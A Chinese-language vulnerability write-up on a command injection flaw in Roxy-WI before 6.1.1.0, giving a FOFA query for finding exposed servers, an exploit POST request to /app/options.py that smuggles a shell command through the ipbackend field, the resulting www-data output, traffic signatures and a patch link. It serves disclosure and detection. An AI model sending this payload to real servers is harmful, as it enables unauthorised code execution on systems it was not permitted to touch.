目录
0x01 声明:
仅供学习参考使用,请勿用作违法用途,否则后果自负。
0x02 简介:
Roxy-WI是开源的一款用于管理 Haproxy、Nginx 和 Keepalived 服务器的 Web 界面。
0x03 漏洞概述:
Roxy-WI 6.1.1.0 之前的版本存在安全漏洞,该漏洞源于系统命令可以通过 subprocess_execute 函数远程运行,远程攻击者利用该漏洞可以执行远程代码。
0x04 影响版本:
Roxy-WI < 6.1.1.0
0x05 环境搭建:
搭建过程太过艰苦,搭建了3天依旧在报错。
(只能fofa去搜索了,后期搭建完后,补充搭建过程。)
app="HAProxy-WI"
0x06 漏洞复现:
Burp改包:
POST /app/options.py
alert_consumer=1&serv=127.0.0.1&ipbackend=%22%3Bid+%23%23&backend_server=127.0.0.1
0x07 流量分析:
特征:
客户端:
url:
POST /app/options.py
data:
alert_consumer=1&serv=127.0.0.1&ipbackend=%22%3Bid+%23%23&backend_server=127.0.0.1
服务端:
data:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
0x08 修复建议:
目前厂商已发布升级了Roxy-WI 安全漏洞的补丁,Roxy-WI 安全漏洞的补丁获取链接:
https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-53r2-mq99-f532
版权声明:本文为qq_44281295原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。